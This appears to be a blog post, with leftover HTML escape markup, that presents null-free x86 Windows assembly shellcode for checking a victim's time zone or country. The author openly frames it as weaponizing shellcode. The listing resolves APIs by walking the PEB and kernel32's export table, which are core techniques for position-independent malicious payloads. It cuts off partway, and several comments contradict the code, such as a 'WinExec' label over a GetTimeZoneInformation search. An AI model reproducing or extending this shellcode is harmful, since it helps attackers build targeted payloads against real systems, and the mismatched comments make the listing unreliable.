Maybe we’re all a little black hat at times – you have to bend the rules to get things done sometimes.
I thought of a couple kinds of shellcode – basically checking to see if the user is in a particular country or timezone.
The concept of weaponizing shellcode is nothing new. This is just more fuel for the fire.<\/p>\n
Since whenever I think of something, code doesn’t exist, it is once again up to Joe to make the code exist.<\/p>\n
The following is for x86 Windows. No nulls either!<\/p>\n
<\/p>\n
.486<\/span>\n .model<\/span> flat<\/span>, stdcall<\/span>\n option<\/span> casemap<\/span> :none<\/span>\n ASSUME<\/span> FS<\/span>:NOTHING<\/span>\n .code<\/span>\nstart:<\/span>\n \n push<\/span> ebx<\/span>\n push<\/span> ecx<\/span>\n push<\/span> edx<\/span>\n push<\/span> esi<\/span>\n push<\/span> edi<\/span>\n\t\txor<\/span> eax<\/span>,eax<\/span>\n\n\t; Establish a new stack frame<\/span>\n\tpush<\/span> ebp<\/span>\n\tmov<\/span> ebp<\/span>, esp<\/span>\n\tmov<\/span> ax<\/span>,2224<\/span>\n\t\n\tsub<\/span> esp<\/span>, eax<\/span> \t\t\t; Allocate memory on stack for local variables<\/span>\n\txor<\/span> eax<\/span>,eax<\/span>\n\tpush<\/span> eax<\/span> \n\t; push the function name on the stack<\/span>\n\txor<\/span> esi<\/span>, esi<\/span>\n\tpush<\/span> esi<\/span>\t\t\t; null termination<\/span>\n\tpush<\/span> 6e6f6974h<\/span>\n\tpush<\/span> 616d726fh<\/span>\n\tpush<\/span> 666e4965h<\/span>\n\tpush<\/span> 6E6F5a65h<\/span>\n\tpush<\/span> 6d695474h<\/span>\n\tpushw<\/span> 6547h<\/span>; var4 = \"GetTimeZoneInformation\\x00\"<\/span>\n\tmov<\/span> [ebp<\/span>-<\/span>4<\/span>], esp<\/span> \t\t\n\tpush<\/span> ax<\/span> ; push 2 bytes to stack to maintain 4 byte alignment <\/span>\n\t; Find kernel32.dll base address<\/span>\n\t;xor esi, esi\t\t\t; esi is already 0, no need to xor<\/span>\n mov<\/span> ebx<\/span>, dword<\/span> ptr<\/span> fs<\/span>:[30h<\/span> +<\/span> esi<\/span>] \t; written this way to avoid null bytes<\/span>\n\tmov<\/span> ebx<\/span>, [ebx<\/span> +<\/span> 12<\/span>] \n\tmov<\/span> ebx<\/span>, [ebx<\/span> +<\/span> 20<\/span>] \n\tmov<\/span> ebx<\/span>, [ebx<\/span>]\t\n\tmov<\/span> ebx<\/span>, [ebx<\/span>]\t\n\tmov<\/span> ebx<\/span>, [ebx<\/span> +<\/span> 16<\/span>]\t\t; ebx holds kernel32.dll base address<\/span>\n\tmov<\/span> [ebp<\/span>-<\/span>8<\/span>], ebx<\/span> \t\t; var8 = kernel32.dll base address<\/span>\n\n\t; Find WinExec address<\/span>\n\tmov<\/span> eax<\/span>, [ebx<\/span> +<\/span> 3Ch<\/span>]\t\t; RVA of PE signature<\/span>\n\tadd<\/span> eax<\/span>, ebx<\/span> \t\t; Address of PE signature = base address + RVA of PE signature<\/span>\n\tmov<\/span> eax<\/span>, [eax<\/span> +<\/span> 78h<\/span>]\t\t; RVA of Export Table<\/span>\n\tadd<\/span> eax<\/span>, ebx<\/span> \t\t\t; Address of Export Table<\/span>\n\n\tmov<\/span> ecx<\/span>, [eax<\/span> +<\/span> 24h<\/span>]\t\t; RVA of Ordinal Table<\/span>\n\tadd<\/span> ecx<\/span>, ebx<\/span> \t\t\t; Address of Ordinal Table<\/span>\n\tmov<\/span> [ebp<\/span>-<\/span>0Ch<\/span>], ecx<\/span> \t\t; var12 = Address of Ordinal Table<\/span>\n\n\tmov<\/span> edi<\/span>, [eax<\/span> +<\/span> 20h<\/span>] \t\t; RVA of Name Pointer Table<\/span>\n\tadd<\/span> edi<\/span>, ebx<\/span> \t\t\t; Address of Name Pointer Table<\/span>\n\tmov<\/span> [ebp<\/span>-<\/span>10h<\/span>], edi<\/span> \t\t; var16 = Address of Name Pointer Table<\/span>\n\n\tmov<\/span> edx<\/span>, [eax<\/span> +<\/span> 1Ch<\/span>] \t\t; RVA of Address Table<\/span>\n\tadd<\/span> edx<\/span>, ebx<\/span> \t\t\t; Address of Address Table<\/span>\n\tmov<\/span> [ebp<\/span>-<\/span>14h<\/span>], edx<\/span> \t\t; var20 = Address of Address Table<\/span>\n\n\tmov<\/span> edx<\/span>, [eax<\/span> +<\/span> 14h<\/span>] \t\t; Number of exported functions<\/span>\n\n\txor<\/span> eax<\/span>, eax<\/span> \t\t\t; counter = 0<\/span>\n\n\tmyloop:<\/span>\n\t mov<\/span> edi<\/span>, [ebp<\/span>-<\/span>10h<\/span>] \t; edi = var16 = Address of Name Pointer Table<\/span>\n\t mov<\/span> esi<\/span>, [ebp<\/span>-<\/span>4<\/span>] \t; esi = var4 = \"GetTimeZoneInformation\\x00\"<\/span>\n\t xor<\/span> ecx<\/span>, ecx<\/span>\n\n\t cld<\/span> \t\t\t; set DF=0 => process strings from left to right<\/span>\n\t mov<\/span> edi<\/span>, [edi<\/span> +<\/span> eax<\/span>*<\/span>4<\/span>]\t; Entries in Name Pointer Table are 4 bytes long<\/span>\n\t \t\t\t; edi = RVA Nth entry = Address of Name Table * 4<\/span>\n\t add<\/span> edi<\/span>, ebx<\/span> \t; edi = address of string = base address + RVA Nth entry<\/span>\n\t add<\/span> cx<\/span>, 23<\/span> \t\t; Length of strings to compare (len('GetTimeZoneInformation') = 23)<\/span>\n\t repe<\/span> cmpsb<\/span> \t; Compare the first 8 bytes of strings in <\/span>\n\t \t\t\t; esi and edi registers. ZF=1 if equal, ZF=0 if not<\/span>\n\t jz<\/span> found<\/span>\n\n\t inc<\/span> eax<\/span> \t\t; counter++<\/span>\n\t cmp<\/span> eax<\/span>, edx<\/span> \t; check if last function is reached<\/span>\n\t jb<\/span> myloop<\/span> \t\t; if not the last -> loop<\/span>\n\n\t mov<\/span> ax<\/span>,2224<\/span>\n\t\t\tadd<\/span> esp<\/span>, eax<\/span>\t\t; clear the stack \t\t<\/span>\n\t ret<\/span> \t\t; if function is not found, return<\/span>\n\n\tfound:<\/span>\n\t\t; the counter (eax) now holds the position of WinExec<\/span>\n\n\t mov<\/span>